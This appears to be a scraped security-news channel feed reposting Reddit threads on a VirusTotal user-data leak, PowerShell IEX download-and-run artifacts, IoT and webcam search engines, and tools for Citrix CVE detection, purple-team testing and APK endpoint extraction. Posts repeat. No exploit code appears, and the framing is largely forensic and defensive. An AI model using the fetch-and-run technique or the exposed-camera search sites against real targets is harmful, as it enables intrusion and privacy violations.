VirusTotal Leak Data of 5,600 registered users
Better change those passwords.
Link here)
🗣hawaii_brian
I feel like I see data leaks of passwords all the time. What makes it so common?
How are they supposed to be stored? Hashed and salted?
👤TheAnxiousPianist
"Users’ names and e-mail addresses have been leaked, but passwords haven’t."
I have 2FA enabled but updated my password anyhow, making it longer and more complex.
👤fmtheilig
Community notes about to get real interesting
👤GoodEbening
🎖@malwr
Better change those passwords.
Link here)
🗣hawaii_brian
I feel like I see data leaks of passwords all the time. What makes it so common?
How are they supposed to be stored? Hashed and salted?
👤TheAnxiousPianist
"Users’ names and e-mail addresses have been leaked, but passwords haven’t."
I have 2FA enabled but updated my password anyhow, making it longer and more complex.
👤fmtheilig
Community notes about to get real interesting
👤GoodEbening
🎖@malwr
Help Net Security
VirusTotal leaked data of 5,600 registered users
VirusTotal has suffered a data leak, which exposed the names and email addresses of 5600 of its registered users.
👍1😱1
Detecting Fileless PowerShell operations
I am currently doing an internship where I am pen testing a proprietary incident response/memory forensics tool. I am new to pentesting/forensics in general. One of the things I am thinking about trying is using IEX in PowerShell to download/run things. Does this leave any kind of artifacts?
What would you be checking for in something like this?
I am planning on using atomic red team or caldera. I have noticed that with ART that the PowerShell commands you run are unique to that program and probably would not be a typical PowerShell command so perhaps not the best way to find out what PowerShell is actually doing but it seemed the easiest way to start testing quickly.
🗣Ghostnineone
Depending on the setup of the target organisation, using powershell on the target will leave logs in the "Windows PowerShell.evtx" logs in decoded form, and if more logging are in place, "powershell transcripts" or "sysmon" logs may exist, other than logs, artifacts like Prefetch, ShimCache or AmCache can provide more evidence of powershell execution.
👤OverZeeR
You can usually find PowerShell in the event logs.
👤smc0881
🎖@malwr
I am currently doing an internship where I am pen testing a proprietary incident response/memory forensics tool. I am new to pentesting/forensics in general. One of the things I am thinking about trying is using IEX in PowerShell to download/run things. Does this leave any kind of artifacts?
What would you be checking for in something like this?
I am planning on using atomic red team or caldera. I have noticed that with ART that the PowerShell commands you run are unique to that program and probably would not be a typical PowerShell command so perhaps not the best way to find out what PowerShell is actually doing but it seemed the easiest way to start testing quickly.
🗣Ghostnineone
Depending on the setup of the target organisation, using powershell on the target will leave logs in the "Windows PowerShell.evtx" logs in decoded form, and if more logging are in place, "powershell transcripts" or "sysmon" logs may exist, other than logs, artifacts like Prefetch, ShimCache or AmCache can provide more evidence of powershell execution.
👤OverZeeR
You can usually find PowerShell in the event logs.
👤smc0881
🎖@malwr
Reddit
From the computerforensics community on Reddit
Explore this post and more from the computerforensics community
❤1
The Tool List of IoT(Internet of Things) Device Search Engines
Internet Of Things (IoT) devices search engines
[Shodan](https://www.shodan.io/)
Criminal IP
[Airport webcams](http://airportwebcams.net/)
Insecam
[Lookr](https://www.lookr.com/)
Earthcam
[Openstreetcam](https://www.openstreetcam.org/map/)
Opentopia
[Pictimo](https://www.pictimo.com/)
Thingful
[Webcam.nl (NL)](https://webcam.nl/live_streaming/)
Webcams.travel
[Worldcam](https://worldcam.eu/)
censys
These tools can be utilized for discovering exposed IoT devices and detecting their vulnerabilities, open ports, etc.
Source: https://osint.link/
🗣talentSA112200
🎖@malwr
Internet Of Things (IoT) devices search engines
[Shodan](https://www.shodan.io/)
Criminal IP
[Airport webcams](http://airportwebcams.net/)
Insecam
[Lookr](https://www.lookr.com/)
Earthcam
[Openstreetcam](https://www.openstreetcam.org/map/)
Opentopia
[Pictimo](https://www.pictimo.com/)
Thingful
[Webcam.nl (NL)](https://webcam.nl/live_streaming/)
Webcams.travel
[Worldcam](https://worldcam.eu/)
censys
These tools can be utilized for discovering exposed IoT devices and detecting their vulnerabilities, open ports, etc.
Source: https://osint.link/
🗣talentSA112200
🎖@malwr
Shodan
Search engine of Internet-connected devices. Create a free account to get started.
citrixInspector: Accurately fingerprint and detect vulnerable (and patched!) versions of Netscaler / Citrix ADC to CVE-2023-3519
🗣digicat
What are the experiences with the IoC checks so far?
👤Alert-Sale2153
🎖@malwr
🗣digicat
What are the experiences with the IoC checks so far?
👤Alert-Sale2153
🎖@malwr
GitHub
GitHub - securekomodo/citrixInspector: Accurately fingerprint and detect vulnerable (and patched!) versions of Netscaler / Citrix…
Accurately fingerprint and detect vulnerable (and patched!) versions of Netscaler / Citrix ADC to CVE-2023-3519 - securekomodo/citrixInspector
PurpleKeep: Providing Azure pipelines to create an infrastructure and run Atomic tests.
🗣digicat
🎖@malwr
🗣digicat
🎖@malwr
GitHub
GitHub - Retrospected/PurpleKeep: Providing Azure pipelines to create an infrastructure and run Atomic tests.
Providing Azure pipelines to create an infrastructure and run Atomic tests. - GitHub - Retrospected/PurpleKeep: Providing Azure pipelines to create an infrastructure and run Atomic tests.
👍1
apk2url - Tool to gather endpoints from an APK
apk2url is a tool that can be useful for developers, pentesters and redteamers for information gathering purposes. This tool gathers IP and URL endpoints from an APK using decompiling and disassembly.
You never know what you can find =)
Try it out:
https://github.com/n0mi1k/apk2url
🗣n0mi1k
Thanks for sharing, i’ll have to check this out!
Any idea on if it captures deeplinks too?
Edit: just saw you wrote it, i’ll give it a go an pass any suggestions if you’d like.
👤Killco_Joe
🎖@malwr
apk2url is a tool that can be useful for developers, pentesters and redteamers for information gathering purposes. This tool gathers IP and URL endpoints from an APK using decompiling and disassembly.
You never know what you can find =)
Try it out:
https://github.com/n0mi1k/apk2url
🗣n0mi1k
Thanks for sharing, i’ll have to check this out!
Any idea on if it captures deeplinks too?
Edit: just saw you wrote it, i’ll give it a go an pass any suggestions if you’d like.
👤Killco_Joe
🎖@malwr
GitHub
GitHub - n0mi1k/apk2url: An OSINT tool to quickly extract IP and URL endpoints from APKs by disassembling and decompiling
An OSINT tool to quickly extract IP and URL endpoints from APKs by disassembling and decompiling - n0mi1k/apk2url